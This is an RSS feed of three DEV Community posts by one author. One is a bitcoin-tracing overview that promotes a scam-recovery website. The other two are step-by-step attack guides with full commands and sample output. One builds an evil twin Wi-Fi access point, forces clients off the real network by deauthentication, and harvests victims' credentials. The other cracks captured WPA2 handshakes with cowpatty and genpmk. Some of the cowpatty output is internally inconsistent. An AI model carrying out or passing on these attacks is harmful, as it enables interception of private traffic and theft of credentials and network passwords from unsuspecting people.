<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: TheScott12</title>
    <description>The latest articles on DEV Community by TheScott12 (@thescott12).</description>
    <link>https://dev.to/thescott12</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1094357%2Fc514bf3f-6402-4a9b-a6cb-3af6665656c7.png</url>
      <title>DEV Community: TheScott12</title>
      <link>https://dev.to/thescott12</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/thescott12"/>
    <language>en</language>
    <item>
      <title>Y3llowl4bs: Cryptocurrency scam investigation | Recover stolen bitcoin</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sun, 04 Jun 2023 00:11:04 +0000</pubDate>
      <link>https://dev.to/thescott12/y3llowl4bs-cryptocurrency-scam-investigation-recover-stolen-bitcoin-3ki4</link>
      <guid>https://dev.to/thescott12/y3llowl4bs-cryptocurrency-scam-investigation-recover-stolen-bitcoin-3ki4</guid>
      <description>&lt;p&gt;&lt;a href="https://y3llowl4bs.com/report-crypto-scams/"&gt;Bitcoin Investigations - How to trace bitcoin addresses. &lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bitcoin offers a unique opportunity for financial investigation in that an amateur can easily research a given person’s bitcoin usage. The most basic framework of financial investigation consists of identifying a target, searching for negative information about them or their past, identifying the target’s associates, and then searching for negative information on them. Bitcoin lends itself perfectly to this kind of investigation.&lt;/p&gt;

&lt;p&gt;Background information on bitcoin&lt;/p&gt;

&lt;p&gt;For those that have no knowledge of bitcoin here is the necessary background information before we start. Bitcoin is only one of many cryptocurrencies. For the purposes of this post, we will focus only on bitcoin. Bitcoin, by design, makes the person anonymous but all of their financial transactions are public.&lt;/p&gt;

&lt;p&gt;If, for example, someone named Asma wants bitcoin she must get a “wallet,” which will contain one or several bitcoin “addresses.” An address can hold money, send money to another address, and receive money. Asma’s bitcoin activity is public, but her name and identity are theoretically anonymous.&lt;/p&gt;

&lt;p&gt;In a scenario where we are given a specific bitcoin address (whether it is anonymous or owned by a known business associate), the following are steps that we can take to investigate and trace bitcoin addresses.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;a href="https://y3llowl4bs.com/report-crypto-scams/"&gt;How to trace bitcoin addresses&lt;/a&gt;
&lt;/h2&gt;

&lt;h2&gt;
  
  
  Blockchain
&lt;/h2&gt;

&lt;p&gt;The blockchain itself is complex and beyond the scope of this post, but the website Blockchain.com is a useful tool for exploring it. The site allows one to look up a bitcoin address and see all of its past financial transactions in addition to how much currency it currently holds. Every transaction, each time the bitcoin address sent or received money, is listed along with the date, the amount of money transferred, and the bitcoin addresses that sent and received the money.&lt;/p&gt;

&lt;p&gt;Below is an example of how one transaction is displayed on Blockchain.com.&lt;/p&gt;

&lt;p&gt;This may appear confusing, but it is quite simple if you know what you are looking at. Below is the same transaction, but I put colored rectangles in the photo to make it more easily understood. Each transaction has a unique string of numbers and letters (in the red rectangle below) that identifies it. This transaction ID is known as a “hash.” Bear in mind that in other contexts, the word hash is used differently.&lt;/p&gt;

&lt;p&gt;The bitcoin addresses are also identified by random strings of numbers and letters. The string in the orange rectangle is the ID for a bitcoin address. The address in orange is sending money to a second address that is in a green rectangle. The orange address is sending 0.1988 bitcoin. Note that the acronym used in the photo “BTC” just means bitcoin. A small amount of the bitcoin will go to a fee (seen below the orange address) and the remainder will go to the green address.&lt;/p&gt;

&lt;p&gt;The number to the right of the green address is the amount received after the fee. Finally, the date and time of the transaction appear at the top right. For further investigation, click on the green address to see what happened with the money next, or click on the orange address to try to find where the money came from.&lt;/p&gt;

&lt;p&gt;Note that bitcoin has “exchanges” where people buy and sell bitcoins. If you find a bitcoin address that has conducted hundreds of thousands of transactions, it is probably owned by an exchange, not a person. If you want to be sure, try googling the bitcoin address, because many exchanges publicly identify their addresses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Use Wallet Explorer to find other wallets
&lt;/h2&gt;

&lt;p&gt;Each bitcoin address is contained in a wallet that may have more addresses. Walletexplorer allows one to find the wallet containing the address of interest (the wallet has its own unique number to identify it). This site also allows one to find if there are other addresses in the same wallet. If there are other addresses in the same wallet, this means that the same person owns the wallet and all of the addresses in it. Therefore, finding the wallet is a great way to find if the owner of one address is also the owner of others.&lt;/p&gt;

&lt;h2&gt;
  
  
  OXT
&lt;/h2&gt;

&lt;p&gt;Another interesting blockchain explorer is the “open exploration tool” (OXT), an exploratory blockchain analysis tool. Just like any other blockchain explorer, OXT can display transactions happening on the Bitcoin network. However, the website also analyzes different types of behavior on the Bitcoin blockchain using various charting and plotting tools. This includes temporal charts covering fees, transactions, scripts, and more. OXT also offers scatter plots, giving a different perspective on transaction and bitcoin address behavior.&lt;/p&gt;

&lt;p&gt;Other popular blockchain explorers that provide similar transaction data and some charts include Blockcypher, Insight, Blocktrail, and Sochain. Each explorer shows blockchain data a little differently but more or less contains the same information about transactions.&lt;/p&gt;

&lt;p&gt;Network Statistics Charts and Plotting Tools&lt;/p&gt;

&lt;h2&gt;
  
  
  Grafana
&lt;/h2&gt;

&lt;p&gt;The website Statoshi.info has a lot of real-time Bitcoin network statistics. The website’s individual dashboards show node counts, bandwidth usage, fee estimates, system metrics, mempool data, and more. Grafana has been around for a few years now, and each dashboard display shows various charts that analyze particular sections of the network and protocol’s behavior.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bitcoin Wisdom
&lt;/h2&gt;

&lt;p&gt;Bitcoin Wisdom is also another charting website that’s been around for quite some time. The website’s price charts are one of the most popular sections within the web portal. Bitcoin Wisdom’s price charts display various exchanges including Bitstamp, BTCC, Kraken, Bitfinex, and more. Furthermore, Bitcoin Wisdom also shows other statistical data such as network difficulty, and the past and present hash rate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Tradeblock
&lt;/h2&gt;

&lt;p&gt;Another website that reports statistical Bitcoin network data includes Tradeblock. The Tradeblock engine offers a wide variety of graphical charts displaying both historical and current Bitcoin statistics. The website’s interface displays the mempool count, blocks mined, transaction count, and many more useful network diagrams. Tradeblock also monitors the Ethereum blockchain and has its own blockchain explorers as well.&lt;/p&gt;

&lt;h2&gt;
  
  
  Blockseer
&lt;/h2&gt;

&lt;p&gt;Blockseer is another exploratory blockchain tool that wants users to “follow the bitcoin.” The tool shows a visual interpretation of transactions on the network alongside the connections each transaction has with individual addresses. The site traces bitcoin origins and follows the path of bitcoins traveling throughout the blockchain using a visual diagram.&lt;/p&gt;

&lt;h2&gt;
  
  
  Websites That Track Nodes
&lt;/h2&gt;

&lt;h2&gt;
  
  
  Node Counter
&lt;/h2&gt;

&lt;p&gt;Node Counter is an analytical website that tracks Bitcoin nodes throughout the network. This includes Bitcoin Classic, Bitcoin Unlimited (BU), XT, and Core nodes in a graphical setting. Each table shows various nodes within the network alongside pools signaling alternate Bitcoin clients and block size proposals. Node counter displays data using both line graphs and pie charts as well.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bitnodes
&lt;/h2&gt;

&lt;p&gt;21 Inc’s Bitnodes is another popular node tracking website that displays various charts and graphs concerning Bitcoin network nodes. The site gives a current network snapshot and also a search engine to check on node status. Bitnodes also displays Classic, BU, Core, and XT nodes within the network.&lt;/p&gt;

&lt;h2&gt;
  
  
  Coin Dance
&lt;/h2&gt;

&lt;p&gt;Last but not least in the node counting realm is the website Coin Dance which shows various summaries and charts concerning nodes across the network. The graphical interface also charts the different node implementations like Core and XT with many types of charts. Furthermore, Coin Dance is a popular site for many other statistics such as Localbitcoins and Paxful volumes, and even charts on political opinions in regards to Segregated Witness, Emergent Consensus, and the most recent UASF (BIP 148) support from well-known industry businesses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Visualizing the Bitcoin Network, Just Got a Whole Lot Easier
&lt;/h2&gt;

&lt;p&gt;All of these monitoring websites offer a different view of the network, and each one has various merits depending on what you’re looking for. The information these tools provide can improve our relationship with the network by getting a better understanding of what’s going on. A graphical display is sometimes a better method for people interpreting network activity and the protocol's behavior.&lt;/p&gt;

&lt;p&gt;The Internet of Money’s transaction value lookup where users can look up the value of a transaction in the past.&lt;/p&gt;

&lt;p&gt;The Internet of Money also has a tool section and various statistical information that can be found on our website as well. Using our transaction value lookup tool, simply add a bitcoin transaction TXID and find its price in the past. For those who are extremely passionate about the subject of Bitcoin, there are plenty of statistics and information to gather each and every day.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>scams</category>
      <category>bitcoin</category>
      <category>investigation</category>
    </item>
    <item>
      <title>How to Create an Evil Twin Access Point; Step-by-Step Guide</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sat, 03 Jun 2023 23:41:39 +0000</pubDate>
      <link>https://dev.to/thescott12/how-to-create-an-evil-twin-access-point-step-by-step-guide-2chn</link>
      <guid>https://dev.to/thescott12/how-to-create-an-evil-twin-access-point-step-by-step-guide-2chn</guid>
      <description>&lt;p&gt;&lt;a href="https://y3llowl4bs.com/how-to-create-an-evil-twin-or-fake-access-point/"&gt;Step-by-Step Guide: Creating an Evil Twin&lt;br&gt;
&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;em&gt;In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.&lt;/em&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Follow our guide and learn how to create an Evil Twin Access Point in just a few easy steps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What is an Evil Twin Access Point?&lt;/strong&gt;&lt;br&gt;
An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.&lt;/p&gt;

&lt;p&gt;Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enable Monitor Mode&lt;/strong&gt;&lt;br&gt;
To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.&lt;/p&gt;

&lt;p&gt;Aircrack-ng is a popular set of tools used to crack wireless networks. It is a suite of tools that includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for setting up monitor mode on wireless cards), and airodump-ng (for capturing wireless traffic).&lt;/p&gt;

&lt;p&gt;Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng check kill

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.&lt;/p&gt;

&lt;p&gt;The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng start wlan0

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Locate the Target Wireless Network&lt;/strong&gt;&lt;br&gt;
The second step is to start scanning nearby wireless routers and locate the Wi-Fi network which you want to clone. Execute the following command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.&lt;/p&gt;

&lt;p&gt;Create the Evil Twin&lt;/p&gt;

&lt;p&gt;Once you’ve found the network which you wish to clone, run the following command in another terminal:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airbase-ng -a 28:EF:01:35:34:85 -e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command creates an Evil Twin network with the SSID name SkyNet; however, it will not be able to provide internet access yet.&lt;/p&gt;

&lt;p&gt;Provide Internet Access to the Evil Twin&lt;/p&gt;

&lt;p&gt;I will add a bridge interface called fake; you can name it anything you like.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brctl addbr fake

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;brctl addif fake eth0
brctl addif fake at0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Assign IP addresses to the interfaces and bring them up using ifconfig:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig at0 0.0.0.0 up
ifconfig fake up
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You can take a look at the bridge network interface with ifconfig:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a  
inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:4 errors:0 dropped:0 overruns:0 frame:0
TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:500 
RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)
eth0 Link encap:Ethernet HWaddr c8:bc:c8
inet addr:10.0.0.19 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80::cabc:a6c1/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:640 errors:0 dropped:0 overruns:0 frame:0
TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:457344 (446.6 KiB) TX bytes:94347 (92.2 KiB)
Interrupt:17
fake Link encap:Ethernet HWaddr 74:85:2a
inet addr:10.0.0.194 Bcast:10.0.0.255 Mask:255.255.255.0
inet6 addr: fe80:::fe97:5b08/64 Scope:Link
inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:859 errors:0 dropped:0 overruns:0 frame:0
TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:492405 (480.8 KiB) TX bytes:130130 (127.0 KiB)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kick Wireless Clients from the Legitimate AP&lt;/strong&gt;&lt;br&gt;
The next step is to kick wireless clients off the legitimate AP; in my case, that’s the SkyNet network. You can do this by using aireplay-ng.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.&lt;/p&gt;

&lt;p&gt;As you can see in the output below, a client has associated with my evil twin. This information is found in the airbase-ng terminal (client 28:EF:01:23:46:68 associated).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;At this point, all the victim’s traffic is going through the attacker’s machine, so he or she can capture sensitive information; it is technically a Man-in-the-Middle attack.&lt;/p&gt;

&lt;p&gt;The attacker can perform various attacks like DNS spoofing which redirects the victim to a cloned or fake login page. Once the victim tries to login, the hacker harvests the credentials.&lt;/p&gt;

&lt;p&gt;Conclusion&lt;/p&gt;

&lt;p&gt;In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.&lt;/p&gt;

</description>
      <category>network</category>
      <category>networking</category>
      <category>wifi</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>How to Speed up the WPA/WPA2 Password Cracking Process using Cowpatty</title>
      <dc:creator>TheScott12</dc:creator>
      <pubDate>Sat, 03 Jun 2023 23:27:32 +0000</pubDate>
      <link>https://dev.to/thescott12/how-to-speed-up-the-wpawpa2-password-cracking-process-using-cowpatty-52b3</link>
      <guid>https://dev.to/thescott12/how-to-speed-up-the-wpawpa2-password-cracking-process-using-cowpatty-52b3</guid>
      <description>&lt;p&gt;Requirements:&lt;/p&gt;

&lt;p&gt;Kali Linux Operating System.&lt;/p&gt;

&lt;p&gt;Handshake File of the Network that You Want to &lt;a href="//y3llowl4bs.com"&gt;Hack&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Wordlist.&lt;/p&gt;

&lt;p&gt;Cowpatty, by Joshua Wright, is a tool that automates offline dictionary attacks for cracking WPA2-PSK passwords. Cowpatty supports using a pre-computed hash file rather than a plain-text word file.&lt;/p&gt;

&lt;p&gt;This can speed up the process of obtaining the “lost” WPA/WPA2 key of your access point. Pre-computed hash files are used to accelerate password brute force when cracking WPA.&lt;/p&gt;

&lt;p&gt;They do this by eliminating the need to perform the costly transformation of a password into an encryption key.&lt;/p&gt;

&lt;h2&gt;
  
  
  Cowpatty
&lt;/h2&gt;

&lt;p&gt;To get a brief rundown of the options, type cowpatty in the terminal:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cowpatty
cowpatty 4.8 - WPA-PSK dictionary attack.

Usage: cowpatty [options]

-f Dictionary file
-d Hash file (genpmk)
-r Packet capture file
-s Network SSID (enclose in quotes if SSID includes spaces)
-c Check for valid 4-way frames, does not crack
-h Print this help information and exit
-v Print verbose information (more -v for more verbosity)
-V Print program version and exit

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Kali Linux will provide you with a brief help screen. Cowpatty requires all of the following:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A word list.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A file where the password hash has been captured.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The SSID of the target AP.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Put the Wireless Adapter in Monitor Mode
&lt;/h2&gt;

&lt;p&gt;You need to put the wireless adapter into monitor mode by typing&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airmon-ng start wlan0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(assuming your interface name is wlan0).&lt;br&gt;
&lt;/p&gt;




&lt;p&gt;This command will change your wireless interface name to wlan0mon.&lt;/p&gt;

&lt;h2&gt;
  
  
  Find The Target
&lt;/h2&gt;

&lt;p&gt;Start scanning nearby wireless routers using your monitor interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng wlan0mon
CH  6][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
28:EF:02:33:38:86 -42 17 0 0 11 54e WPA2 CCMP PSK CISCO-Net

BSSID STATION PWR Rate Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Capture the Handshake
&lt;/h2&gt;

&lt;p&gt;Next, you need to start capturing the 4-way handshake file where the hashed password will be stored.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;airodump-ng --bssid 28:EF:01:35:34:85 -c 6 -w handshake wlan0mon

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will start a dump on the selected AP (28:EF:01:35:34:85), on the selected channel (-c 6), and save the hash in a file named handshake.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CH  6][ Elapsed: 4 s ][ 2014-03-24 17:51 ][ WPA handshake: 28:EF:01:35:34:85

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

28:EF:01:35:34:85 39 100 51 0 0 6 54 WPA2 CCMP PSK SkyNet

BSSID STATION PWR Lost Packets Probes

28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If someone connects to the AP, I will capture the hash and airodump-ng will show me it has been captured in the upper right-hand corner (WPA handshake: 28:EF:01:35:34:85).&lt;br&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  Run Cowpatty
&lt;/h2&gt;



&lt;p&gt;Now that I have the hash of the password, I can use it with cowpatty and the wordlist to crack the hash.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cowpatty -f wordlist.txt -r handshake-01.cap -s SkyNet
cowpatty 4.8 - WPA-PSK dictionary attack. &amp;lt;jwright@hasborg.com&amp;gt;

Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
key no. 1000: angelgirl
key no. 2000: missouri
key no. 3000: birdsong

The PSK is "justletmein".

2000 passphrases tested in 294.42 seconds: 50000.00 passphrases/second
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Cowpatty generates a hash of every word in the wordlist, using the SSID as a seed, and compares it to the captured hash. When the hashes match, it displays the password of the AP. This process is very CPU intensive and slow.&lt;/p&gt;

&lt;p&gt;Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password much faster.&lt;/p&gt;

&lt;p&gt;You can generate your own hashes for the target SSID using a tool called genpmk.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;genpmk -f wordlist.txt -d hash -s SkyNet
genpmk 1.3 - WPA-PSK precomputation attack. &amp;lt;jwright@hasborg.com&amp;gt;
File cowpatty_dict does not exist, creating.
key no. 1000: pinkgirl
key no. 2000: lovecandy
key no. 3000: steve2006
key no. 4000: honeycow

2641 passphrases tested in 4.60 seconds: 451.00 passphrases/second
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Once you have generated the hash for the particular SSID, you can then crack the password with cowpatty by typing:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;cowpatty -d hash -r handshake-01.cap -s SkyNet
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The -d argument is the name of the pre-calculated PMK hash file, -r is the captured handshake file, and -s is the ESSID (network name).&lt;/p&gt;



</description>
      <category>tutorial</category>
      <category>linux</category>
      <category>opensource</category>
      <category>security</category>
    </item>
  </channel>
</rss>
